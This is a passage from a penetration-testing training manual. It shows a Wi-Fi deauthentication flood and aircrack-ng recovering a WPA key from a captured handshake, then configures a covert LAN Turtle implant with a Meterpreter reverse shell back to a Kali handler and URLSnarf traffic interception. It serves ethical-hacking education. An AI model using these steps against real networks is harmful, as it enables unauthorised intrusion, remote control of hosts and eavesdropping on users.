12:59:21 Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:22 Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:22 Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:23 Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:23 Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]

Stop the deauth after sometime. Also stop airodump. This process will have created .cap file of
the whole process.

Now we will try to crack the password using aircrack. We have already created a list of passwords
in our wifi pineapple section.

TRANCHULAS | www.tranchulas.com 247

Hands-On Ethical Hacking and Penetration Testing Training Course

oot@kali:~# aircrack-ng cracking_wifi-01.cap -w /root/Documents/password.lst

Opening cracking_wifi-01.cap
Read 164176 packets.

# BSSID ESSID Encryption

1 64:70:02:4E:70:5B please_hack_me WPA (1 handshake)

Choosing first network as target.

Opening cracking_wifi-01.cap
Reading packets, please wait...

Aircrack-ng 1.2 rc4

[00:00:00] 4/4 keys tested (937.65 k/s)

Time left: 0 seconds 100.00%

KEY FOUND! [ testing123 ]

Master Key : E1 50 16 E9 D9 98 A7 CB 2F B0 65 1C 81 AC EA A1
A3 30 3C B5 47 CF A0 A3 E7 86 73 C6 AF FD 60 B5

Transient Key : EE F5 07 C5 9B B8 A1 83 1B 75 95 56 1E C9 32 CE
67 C1 A0 39 F9 C5 E2 7F 75 33 17 8F 10 83 E7 A9
13 32 D9 9D A6 76 36 B1 58 5F A1 EB F5 8E A2 E7
58 33 42 93 4B 23 69 6A A3 88 C9 13 13 C1 55 9F

EAPOL HMAC : C8 7C C6 A7 BC F1 A1 99 0C 9B FC CE D7 FE 19 9E

The password is testing123

The cracking process will take some time depending upon how large the password list is and how
strong your hardware is.

TRANCHULAS | www.tranchulas.com 248

Hands-On Ethical Hacking and Penetration Testing Training Course

Module 12: Other Attacks

TRANCHULAS | www.tranchulas.com 249

Hands-On Ethical Hacking and Penetration Testing Training Course

LAN Turtle

The LAN Turtle is a covert Systems Administration and Penetration Testing tool providing stealth
remote access, network intelligence gathering, and man-in-the-middle monitoring capabilities.
The LAN Turtle is exceptionally good at providing:

• Remote Access
• Network Intelligence
• Man-in-the-Middle

• USB Ethernet and Power

o Enumerates on the host computer as a generic USB Ethernet device. The
onboard Linux-based system uses this Interface (eth0) to offer the host
computer an IP address via DHCP.
• Covert Case
o Generic USB Ethernet Adapter case blends into the target network environment
allowing for concealment behind desktops, in telephone closets and server racks.
• Ethernet
o Standard Ethernet port (eth1) set to obtain an IP address from the host LAN
DHCP server. If present, will bridge with a host PC connected to the USB (eth0)
port.
• Green Power Indicator LED
• Amber Status Indicator LED
• Reset Button (Inside Case)
o Press to reset to default configuration
o Hold while powering on to access HTTP firmware recovery
First we need to configure the LAN turtle. Connect it to your PC and wait for 30 seconds. First you
need to download putty from:

TRANCHULAS | www.tranchulas.com 250

Hands-On Ethical Hacking and Penetration Testing Training Course

http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
Start putty and login into LAN turtle using SSH. The IP is 172.16.84.1

We have downloaded Putty because SSH client is not available on windows by default. However
if you are on Linux you can simply run the SSH command in terminal. First change the translation
from UTF-8 to ISO-8859-1:1998 in Putty.

TRANCHULAS | www.tranchulas.com 251

Hands-On Ethical Hacking and Penetration Testing Training Course

Once you click Open you will get a new window. You need to enter the credential, username is
root and password is sh3llz.
Change the default password. After that the configuration windows will appear

You can update the firmware by going to Config -> Check for updates. However an active internet
connection is required. A LAN cable should be attached with the LAN turtle.

The Turtle Shell:

The LAN Turtle is managed through the Turtle Shell - a text based, menu-driven graphical user
interface accessible by SSH. The menus may be navigated using standard arrow, tab, escape and

TRANCHULAS | www.tranchulas.com 252

Hands-On Ethical Hacking and Penetration Testing Training Course

return keys as well as mouse in most terminals. The Turtle Shell's Configuration Menu provides
the ability to change advanced settings such as Password, MAC address, IP address. Firmware
updates may be checked for and installed as they become available.
By default the Turtle Shell will start at login via SSH unless disabled from the Configuration Menu.
Exiting the Turtle Shell returns the user to the LAN Turtle's bash shell. To return to the Turtle
Shell, run the "turtle" command

Press Esc and you will go to command line. You can run all the Linux commands on it.

To go back to the menu type turtle.

TRANCHULAS | www.tranchulas.com 253

Hands-On Ethical Hacking and Penetration Testing Training Course

Metasploit and LAN Turtle:

We can use LAN turtle to create a meterpreter reverse shell which can be handled in metasploit.
To configure it start a Kali machine. Check the IP address of the Kali machine using ifconfig
command.

Start msfconsole and create a handler.

root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.84.178
LHOST => 172.16.84.178
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set EXITONSESSION false
EXITONSESSION => false
msf exploit(handler) > exploit -j

Now go to LAN turtle. Go to modules -> Meterpreter

TRANCHULAS | www.tranchulas.com 254

Hands-On Ethical Hacking and Penetration Testing Training Course

Go to CONFIGURE and provide the IP and port of the Kali machine where it will connect to.

TRANCHULAS | www.tranchulas.com 255

Hands-On Ethical Hacking and Penetration Testing Training Course

Select Submit and then Start

As soon as you start you will get a shell on the Kali machine

TRANCHULAS | www.tranchulas.com 256

Hands-On Ethical Hacking and Penetration Testing Training Course

Now we can migrate to the shell using sessions –i 1. We can run various meterpreter commands
like sysinfo

meterpreter > sysinfo

Computer : turtle
OS : Linux turtle 3.10.49 #9 Wed May 20 04:39:35 UTC 2015 mips
Meterpreter : php/php

Man in the Middle Attack:

LAN turtle can be used to perform man in the middle attacks using a module name URLSnarf. This
can be used to monitor all the traffic that is going through the system. To enable the module
login to LAN Turtle using ssh. I will use kali linux this time to login.

Go to Modules -> url-snarf

Go to Configure

TRANCHULAS | www.tranchulas.com 257

Hands-On Ethical Hacking and Penetration Testing Training Course

Let’s first Test it. Select Test and browse to some website using your browser.

When we look to the turtle interface, we can see the logs

TRANCHULAS | www.tranchulas.com 258

Hands-On Ethical Hacking and Penetration Testing Training Course

We can also save the logs to various locations.

References
1. Port scan technical - http://www.cathaycenturies.com/blog/?p=1120
2. Network mapping - https://pentestmag.com/network-mapping_-network-mapping-issue-beta-
version-of-publication/
3. Nmap definition - https://nmap.org/
4. Nikto - http://sectools.org/tool/nikto/
5. OpenVAS - http://www.openvas.org
6. ARP spoofing - https://toschprod.files.wordpress.com/2012/01/arp_spoofing1.png
7. BeEF - http://beefproject.com/
8. Local File inclusion - https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
9. Phishing - https://www.mysecurityawareness.com/article.php?article=284&title=beware-of-
phishing-email-scams#.V_N4AOirhBc
10. John - http://sophie2.aero.jussieu.fr/distrib/Mageia/2/i586/media/core-release/by-
pkgid/789c85467e9ddc13583f3bc393989e45/files/29
11. Browser exploitation - https://theonemarch.wordpress.com/2011/11/14/metasploit-browser-
exploit-method/

TRANCHULAS | www.tranchulas.com 259